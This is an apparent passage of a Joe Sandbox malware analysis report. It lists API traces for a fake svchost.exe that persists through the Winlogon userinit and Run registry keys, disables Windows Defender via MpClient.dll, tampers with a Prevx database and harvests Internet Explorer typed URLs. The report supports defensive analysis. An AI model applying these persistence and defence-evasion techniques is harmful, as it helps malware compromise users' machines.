Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$Buffer$AllocDisplayFileInformationQueryValidateWrite_snprintfmemset
String ID: %S$netuser{
API String ID: 639091076-3648794683
Opcode ID: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
Instruction ID: a09513ab196caa84cab5f38fd2b69e8b71630842e68712c06780eeb64ca6a33b
Opcode Fuzzy Hash: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
Instruction Fuzzy Hash: 0B51D871E40259ABDF26CFA4DC58BEFBBB9EF85701F144695E804E7244D7309A04CBA1

Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
CloseHandle.KERNEL32(00000000), ref: 00402547

Strings

\PrevxCSI\csidb.csi, xrefs: 0040245A

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9

Function 02C73310 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C73335
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
PathAddBackslashA.SHLWAPI(?), ref: 02C73361
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
_snprintf.MSVCRT ref: 02C73399
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C733EE
RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
RegCloseKey.ADVAPI32(00000000), ref: 02C7341A

Strings

userinit, xrefs: 02C73406
C:\Windows\apppatch\svchost.exe, xrefs: 02C733C4, 02C733FB
software\microsoft\windows\currentversion\run, xrefs: 02C733E4
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C733AD
SystemDrive, xrefs: 02C7334F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 3780845138-4271125494
Opcode ID: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
Instruction ID: 77455b1871250831008721f3d0005f1f0931f4f4ce81c7aab28f52af9f795f73
Opcode Fuzzy Hash: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
Instruction Fuzzy Hash: 56213CB1E80248BBFB15CB90DD4AFEDB77CEB44B00F104598B705A7080D7B4AA44CBA1

Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
PathAddBackslashA.SHLWAPI(?), ref: 00402873
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
_snprintf.MSVCRT ref: 004028AB
RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
RegFlushKey.ADVAPI32(00000000), ref: 0040292D
RegCloseKey.ADVAPI32(00000000), ref: 00402937

Strings

software\microsoft\windows\currentversion\run, xrefs: 004028F0
userinit, xrefs: 00402918
software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
SystemDrive, xrefs: 00402861

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 3547530944-2324515132
Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8

Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401C96
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
GetLastError.KERNEL32 ref: 00401CB0
SwitchToThread.KERNEL32 ref: 00401CBF
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
CloseHandle.KERNEL32(00000000), ref: 00401CF9
Module32First.KERNEL32(00000000,?), ref: 00401D1A
StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
Module32Next.KERNEL32(00000000,00000224), ref: 00401D56

Strings

kernel, xrefs: 00401D30
.dll, xrefs: 00401D42

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9

Function 02C93B50 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C93B76
CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
GetLastError.KERNEL32 ref: 02C93B90
SwitchToThread.KERNEL32 ref: 02C93B9F
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
CloseHandle.KERNEL32(00000000), ref: 02C93BD9
Module32First.KERNEL32(00000000,?), ref: 02C93BFA
StrStrIA.SHLWAPI(?,kernel), ref: 02C93C1C
StrStrIA.SHLWAPI(00000000,.dll), ref: 02C93C28
Module32Next.KERNEL32(00000000,00000224), ref: 02C93C36

Strings

.dll, xrefs: 02C93C22
kernel, xrefs: 02C93C10

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
Instruction ID: d2d9058f1445d8cf351f5a5261efd48de42c6316710ee31e9748862b917e9faa
Opcode Fuzzy Hash: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
Instruction Fuzzy Hash: 45219971E4155467DB11ABA9AC4CBDEB3ACDF89714F1007D5E905D3180DB30DE458BA1

Function 02C747E0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105fileregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?,00000000), ref: 02C74803
_snprintf.MSVCRT ref: 02C7482B
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,762335B0), ref: 02C74862
WriteFile.KERNEL32(00000000,IE history:,0000000C,02C74FAE,00000000), ref: 02C7488C
WriteFile.KERNEL32(00000000,02CB3BE4,00000001,02C74FAE,00000000), ref: 02C7489E
WriteFile.KERNEL32(00000000,?,?,02C74FAE,00000000), ref: 02C748CA
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C74FAE,00000000), ref: 02C748DC
_snprintf.MSVCRT ref: 02C748F7
RegCloseKey.ADVAPI32(?), ref: 02C7490D

Strings

url%i, xrefs: 02C74813, 02C748E3
IE history:, xrefs: 02C7487C
Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 02C747F6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileWrite$_snprintf$CloseOpenQueryValue
String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
API String ID: 4020389783-427538202
Opcode ID: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
Instruction ID: 1b95446c8a17b725b57605333fab497b60f51914e9535f3550e19f0a27500698
Opcode Fuzzy Hash: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
Instruction Fuzzy Hash: FF313DB1D4025DBBEB25DF94DC89FEEB77CEF44704F00459AA605A3141E7B05B548BA0

Function 02C76778 Relevance: 19.6, APIs: 13, Instructions: 140memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02C7682E
HeapAlloc.KERNEL32(00000000), ref: 02C76835
memset.MSVCRT ref: 02C76849
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76858
PathAddBackslashA.SHLWAPI(00000000), ref: 02C7685F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768D3
HeapValidate.KERNEL32(00000000), ref: 02C768D6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768E3
HeapFree.KERNEL32(00000000), ref: 02C768E6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
String ID:
API String ID: 296989886-0
Opcode ID: 003de138684be4deab8547d03c1acd8202abc211a1dd9dbdcb42b19c9d054058
Instruction ID: ceb7129cbc7e11362f0d9a47eaf3303412d83b723b6487a64ef2fcbc3bb9f872
Opcode Fuzzy Hash: 003de138684be4deab8547d03c1acd8202abc211a1dd9dbdcb42b19c9d054058
Instruction Fuzzy Hash: AB412971E087865BCB224F309C99BA77FADEF81345F284594ED8687242DB32D60DC791

Function 02C76570 Relevance: 19.6, APIs: 13, Instructions: 117memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
memset.MSVCRT ref: 02C765F4
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
CloseHandle.KERNEL32(00000000), ref: 02C7666E
IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
String ID:
API String ID: 995291462-0
Opcode ID: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
Instruction ID: a6d5ba3fe5b7dc7c35c181564afb746dc971d058794fad2efa10cf46b787aa8d
Opcode Fuzzy Hash: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
Instruction Fuzzy Hash: E3310372E40254BBDB218FA59C48FABBB7CEF80B14F108658FD14A7280D7308A148BA0

Function 02C76240 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C76271
memset.MSVCRT ref: 02C7628F
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
RegQueryValueExA.KERNEL32(?,7D2DE31Fa,00000000,00000001,?,00000104), ref: 02C762D2
GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
HeapAlloc.KERNEL32(00000000), ref: 02C76351
memset.MSVCRT ref: 02C76365
lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
RegCloseKey.ADVAPI32(?), ref: 02C7638C

Strings

7D2DE31Fa, xrefs: 02C762CC
software\microsoft, xrefs: 02C762A1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: 7D2DE31Fa$software\microsoft
API String ID: 217510255-2907480880
Opcode ID: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
Instruction ID: 3471b68e4a835b0fa5063bde680b29b635e56a2b8e81eeee3e7ffb16df0b7b1c
Opcode Fuzzy Hash: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
Instruction Fuzzy Hash: DD310871E4026D6AEB26DB649C09BDE7B6CEF04704F100599EA1DE7141E7B08B44CBE1

Function 02C760E0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C76111
memset.MSVCRT ref: 02C7612F
RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C7614A
RegQueryValueExA.KERNEL32(80000001,7D2DE31Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C76171
GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
memset.MSVCRT ref: 02C76205
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C

Strings

7D2DE31Fa, xrefs: 02C7616B
software\microsoft, xrefs: 02C76144

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: 7D2DE31Fa$software\microsoft
API String ID: 217510255-2907480880
Opcode ID: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
Instruction ID: 01ab0bc2ad4d45cd08dc3ae6a38c052b133b4db611de5721e0a942fd5e20b490
Opcode Fuzzy Hash: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
Instruction Fuzzy Hash: 41312871E8025C6BDB26DB64DC49FDE7BACEF18704F104598E609E7141E3B08B448BA1

Function 02C92E00 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E88
GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
CloseHandle.KERNEL32(?), ref: 02C92ECC
GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
CloseHandle.KERNEL32(00000000), ref: 02C92EEF

Strings

ADVA, xrefs: 02C92E8E
*SYSTEM*, xrefs: 02C92E5D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Information$CharCloseOpenProcessTokenUpper
String ID: *SYSTEM*$ADVA
API String ID: 1998047302-3691563785
Opcode ID: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
Instruction ID: 7f2bd8690ff1dfab9be954a6c89663d6062ef08d3c0c7ee721daf379dcadf0f9
Opcode Fuzzy Hash: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
Instruction Fuzzy Hash: C531A171D40288BBEF11CBA1C88CFBE7B7CAF85306F048598ED8667181D7749615CB62

Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FFE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
SetCurrentDirectoryA.KERNEL32(?), ref: 00402037
LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402046
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
FreeLibrary.KERNEL32(00000000), ref: 0040208C

Strings

Windows Defender, xrefs: 0040201E
V,@, xrefs: 00402092
MpClient.dll, xrefs: 00402041
WDEnable, xrefs: 00402055

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$V,@$WDEnable$Windows Defender
API String ID: 1010965793-4204822615
Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8

Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
SysAllocString.OLEAUT32(?), ref: 004025C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
SysFreeString.OLEAUT32(00402C95), ref: 0040273D
SysFreeString.OLEAUT32(00000000), ref: 00402744
CoUninitialize.COMBASE ref: 0040279E

Strings

Windows Explorer, xrefs: 004025CD

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94

Function 02C934A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C934D3
GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
memset.MSVCRT ref: 02C93501
GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E

Part of subcall function 02C82D50: GetProcessHeap.KERNEL32(00000008,02C93547,00000000,75B534D0,7736C3F0,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D6E
Part of subcall function 02C82D50: HeapAlloc.KERNEL32(00000000,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D75
Part of subcall function 02C82D50: memset.MSVCRT ref: 02C82D85

GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02C934B0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 2345603349-374730529
Opcode ID: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
Instruction ID: 5d39b8423ee337d5eb484f8bc5143e6573950741a925296a020dcb575222c5bd
Opcode Fuzzy Hash: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
Instruction Fuzzy Hash: CF217B72D0014AA7CF12A6549C48BFBB7BD9FC8B05F1005D9E94593140EB70EB058BA1

Function 02C81330 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C81347
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3

Strings

7d2de60fa, xrefs: 02C81371

Memory Dump Source

